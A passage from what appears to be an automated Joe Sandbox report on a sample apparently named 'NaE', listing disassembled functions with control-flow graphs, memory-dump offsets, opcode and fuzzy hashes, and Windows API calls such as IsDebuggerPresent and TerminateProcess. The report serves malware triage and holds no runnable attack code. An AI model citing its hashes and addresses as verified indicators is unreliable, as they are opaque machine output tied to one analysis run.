                                                      control_flow_graph 513 70d4d8-70d4ea 514 70d4f0 513->514 515 70d57e-70d585 513->515 516 70d4f2-70d4fe 514->516 515->516 518 70d504-70d526 516->518 519 70d58a-70d58f 516->519 520 70d594-70d5a9 518->520 521 70d528-70d546 518->521 519->518 525 70d560-70d568 520->525 524 70d54e-70d55e 521->524 524->525 526 70d5b6 524->526 527 70d56a-70d57b 525->527 528 70d5ab-70d5b4 525->528 528->527
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9eadab77dea37ecae685c8f42011754f9f031cf0b22eec0ddae01bb8ee2af5d2
                                                      • Instruction ID: 54f267cefe182dcebdf85d809814494e5235266a5d90015e60cd701a1533a204
                                                      • Opcode Fuzzy Hash: 9eadab77dea37ecae685c8f42011754f9f031cf0b22eec0ddae01bb8ee2af5d2
                                                      • Instruction Fuzzy Hash: 7F212B71504340DFDB14DF94D9C0B16BBE5FB94318F208269ED054B296C33ADC66C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D5C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 530 70d5c4-70d5d6 531 70d66a-70d671 530->531 532 70d5dc 530->532 533 70d5de-70d5ea 531->533 532->533 534 70d5f0-70d612 533->534 535 70d676-70d67b 533->535 537 70d680-70d695 534->537 538 70d614-70d632 534->538 535->534 542 70d64c-70d654 537->542 541 70d63a-70d64a 538->541 541->542 543 70d6a2 541->543 544 70d656-70d667 542->544 545 70d697-70d6a0 542->545 545->544
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 698e25882d5509a51a8235099d413cbb2076d6bad82102118b3a0a8d5c3fd733
                                                      • Instruction ID: 54f29646a8f844f60d939e40bc638ecaa826c13b67d9a22638b52db193cdb96d
                                                      • Opcode Fuzzy Hash: 698e25882d5509a51a8235099d413cbb2076d6bad82102118b3a0a8d5c3fd733
                                                      • Instruction Fuzzy Hash: 6A2128B1504340DFDB24DF90D9C0B16BBE5FB84314F24C669E8090B286C33ADC56CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D4D3 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: c4fb2a2f1ed7051c778c77b9a38fa06eefc93cbb3ade5c74bc2229abcad3ba26
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: CF11B176504340CFCB15CF54D9C4B16BFB2FB94328F2486A9DC090B656C33AD86ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D5BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction ID: d873c6b8369d686900ddc0e4b057b138644dba0c34133e181294cd467e2a9759
                                                      • Opcode Fuzzy Hash: 6a2a4232aa45621a27d7c7c5d03b7cad02ec4d38aa47425da21248f8a1ed116c
                                                      • Instruction Fuzzy Hash: C211E676504380CFCB15CF50D5C4B16BFB2FB94314F24C6A9D8490B656C33AD85ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 721c53e280033e4d434882037e2a4d9401111bfba7ee9ad0b605c35bbb20b20b
                                                      • Instruction ID: 5a26888d393a0caed046da844123a773dddad7f9f67814a8392029740de78fc2
                                                      • Opcode Fuzzy Hash: 721c53e280033e4d434882037e2a4d9401111bfba7ee9ad0b605c35bbb20b20b
                                                      • Instruction Fuzzy Hash: 5901A271509340EBE7308AA5C984B67BBD8EF81724F18C61AED4D4A2C2C37D9C45CAB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D01C Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1459289710.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_70d000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9163ef1ca01d55e4fe53b353fb4c365700091e10de71edfc696b67fb482f4691
                                                      • Instruction ID: 7293911b267d11422889d3264d4e42edd73108d91e80b65addc1b1cb0b4e3fb3
                                                      • Opcode Fuzzy Hash: 9163ef1ca01d55e4fe53b353fb4c365700091e10de71edfc696b67fb482f4691
                                                      • Instruction Fuzzy Hash: 5BF06D72409344EFE7208E16C988B66FBD8EB91734F18C55AED8C4A2C7C2799C45CAB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 2579439406-0
                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408C60 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$PA
                                                      • API String ID: 0-3039612711
                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                      • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                      • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407C3F Relevance: .8, Instructions: 783COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                      • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                      • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                      • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004073A0 Relevance: .6, Instructions: 633COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                      • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                      • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                      • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406CA0 Relevance: .4, Instructions: 401COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                      • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                      • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                      • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402B90 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                      • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                      • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                      • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004028B0 Relevance: .2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                      • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                      • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                      • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02211020 Relevance: .2, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef74b7f9c551e74f841521723c0d9c5bdb32fcdcdf32614aecfb920740a3e6c2
                                                      • Instruction ID: 6015870e9ae00b9f54575475407e64a7578299a08abae0d74efae5a99919a601
                                                      • Opcode Fuzzy Hash: ef74b7f9c551e74f841521723c0d9c5bdb32fcdcdf32614aecfb920740a3e6c2
                                                      • Instruction Fuzzy Hash: 0E516270E40204CFE708EF7AE85469ABBE7BBC9300F08C5B9C405AF269DB7415169F92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02211030 Relevance: .1, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb39341f2ca4c3adfa418cc9a1e6a1d622727e32eafd9b80ddc8f34fd4625713
                                                      • Instruction ID: a6af7b7b13fb5a834daebe27b5f399df36bb9b4af67fb2a4c0d2202de18bace8
                                                      • Opcode Fuzzy Hash: cb39341f2ca4c3adfa418cc9a1e6a1d622727e32eafd9b80ddc8f34fd4625713
                                                      • Instruction Fuzzy Hash: D15151B0E10204CFE708EF7AE85469ABBE7BBC9700F08C579C405AF269DB7419059F92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401650 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                      • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                      • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                      • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F20 Relevance: .1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                      • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                      • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                      • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F89 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                      • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                      • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                      • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022818D8), ref: 004170C5
                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                      • _malloc.LIBCMT ref: 0041718A
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                      • _malloc.LIBCMT ref: 0041724C
                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                      • __freea.LIBCMT ref: 004172A4
                                                      • __freea.LIBCMT ref: 004172AD
                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                      • ___convertcp.LIBCMT ref: 00417309
                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                      • _malloc.LIBCMT ref: 00417362
                                                      • _memset.LIBCMT ref: 00417384
